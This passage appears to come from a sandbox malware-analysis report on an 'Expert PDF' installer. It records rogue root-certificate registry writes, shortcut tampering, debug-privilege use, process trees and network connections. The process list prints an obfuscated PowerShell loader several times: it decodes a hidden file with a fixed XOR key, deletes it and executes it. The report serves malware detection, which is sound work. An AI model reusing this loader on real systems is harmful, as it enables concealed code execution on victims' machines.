e6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe
"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"
C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
"C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.38.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.146.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-updateservice.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | api-updateservice.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | 225.159.15.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.212.199.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wsgeoip.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | wsgeoip.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 104.208.16.90:443 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| NL | 173.223.113.164:443 | | tcp |
| NL | 173.223.113.131:80 | | tcp |
| US | 204.79.197.203:80 | | tcp |
| US | 8.8.8.8:53 | 2.77.109.52.in-addr.arpa | udp |
| NL | 84.53.175.11:80 | | tcp |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.238.32.23.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.120:443 | assets.msn.com | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | 120.143.101.95.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | download14.expert-pdf.com | udp |
| CA | 64.15.159.225:80 | download14.expert-pdf.com | tcp |
| CA | 64.15.159.225:443 | download14.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | redamex.expert-pdf.com | udp |
| CA | 64.15.159.204:443 | redamex.expert-pdf.com | tcp |
| CA | 64.15.159.225:80 | download14.expert-pdf.com | tcp |
| CA | 64.15.159.225:443 | download14.expert-pdf.com | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | 204.159.15.64.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
